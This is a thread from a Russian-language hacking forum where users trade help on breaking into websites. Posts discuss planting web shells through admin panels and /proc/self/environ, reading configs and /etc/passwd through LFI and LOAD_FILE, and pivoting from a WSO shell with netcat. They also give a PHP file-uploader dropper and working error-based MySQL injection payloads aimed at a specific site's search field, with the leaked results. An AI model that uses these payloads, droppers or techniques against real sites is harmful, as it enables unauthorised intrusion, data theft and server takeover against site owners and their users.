Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    немогу залить шелл через админку. Просто тупо не через что не заливается, да и путей залития практически нет, только баннерная реклама. Есть еще какие либо способы заливки шелла, и получения доступа к БД?
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Есть. Купить мозг и назвать хотя бы ГДЕ ты пытаешься это сделать или сразу дать ссылку
     
    1 person likes this.
  3. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    скипио показал пример с двойным запросом. это типа когда одно из полей результата первого запроса идёт во второй запрос.
    у тебя ошибку выдает если в какое-нибудь поле подставить 0x27 = ковычка ?
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Ты посмотри внимательно код - там двойной запрос, точнее два запроса, а у тебя скорее всего один, как и во всех скулях...
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Нет.
     
    1 person likes this.
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    проверить, нет ли там LFI одновременно со скулей. Если нет - тупо читать конфиги, дальше по ситуации
     
    1 person likes this.
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Кто тебе сказал, что через LOAD_FILE нельзя читать PHP-код?
    Это не является способом обхода кавычек :)
     
  8. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    такие вопросы голосованием не решаются ;)
    не выполнится, только разве что скрипт зачем-нибудь поставит результаты запроса в eval. Полагаю, такая ситуация очень маловероятна
     
    1 person likes this.
  9. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    мне кажется ты путаешь читалку через sql-inj и php инклуд.
    в твоем случае возможно есть чтение файлов через load_file(hex/char значение пути и имени). Но в этом случае ты читаешь файл, а не вынуждаешь его выполниться как php-код.
    почитай про load_file

    ps
    Пример чтения /etc/passwd:
     
    1 person likes this.
  10. Матня

    Матня Banned

    Joined:
    19 Dec 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Подскажите плиз. Мне нужен скрипт для залития аплоадера файлов через /proc/self/environ т.е. этот скрипт заливает аплоадер в корень сайта. раньше мне чел под ником попугай дал его. но у меня полетел сервак и скрипт пропал. может есть у кого.
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    когда я говорил про LFI, то не имел в виду load_file, если вы не встречали таких скулей, где одновременно и скуля и LFI - то еще встретите. Просто надо внимательно читать ошибки, которые выводятся на экран.
     
    2 people like this.
  12. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Что значит залитие аплоадера файлов?
    Через /proc/self/environ можно залить шелл. Читай, например, здесь.
     
  13. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    а вот и принтабельное поле 2 3 ))
    тока дальше не подчиняется ((
     
  14. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    люди,знаю, что много раз обсуждалось, но все же, на фтп на все папки стоят права 755,а на файлы 644, ничего не могу залить. Можно ли как то обойти эту проблему?
    P.S. Если есть мануалы, с радостью почитаю
     
    #10714 jecka3000, 20 Dec 2009
    Last edited: 20 Dec 2009
  15. Cybersteger

    Cybersteger Member

    Joined:
    9 Oct 2009
    Messages:
    40
    Likes Received:
    13
    Reputations:
    15
    Помогите пожалуста! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??
     
    #10715 Cybersteger, 20 Dec 2009
    Last edited: 7 Apr 2015
  16. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    Мне кажется Матня имел ввиду просто аплоадер файлов
    Code:
    <form enctype=multipart/form-data  method=post>
    <input name=x type=file><input type=submit></form>
    <?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>
    Ну а код, который этот аплоадер создает:
    Code:
    <?php $f = fopen('up.php','w');fwrite($f,'<form enctype=multipart/form-data  method=post><input name=x type=file><input type=submit></form><?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>');fclose($f); ?>
     
  17. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    http://forum.antichat.ru/showthread.php?t=107655
     
  18. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    в поле "Что искать" вводим ' и эррор. Это просто эррор или скуля? нет возможности проверить точно, поэтому прошу глянуть.
     
  19. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Да, скуля, в строку поиска вводим:

    Code:
    %'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
    Получаем:

    MySQL Error: 1060 (Duplicate column name '5.0.51a')
     
    3 people like this.
  20. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    2 $n@ke
    Code:
    xek%')/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b#
    Duplicate column name 'CHARACTER_SETS'
     
    1 person likes this.
Thread Status:
Not open for further replies.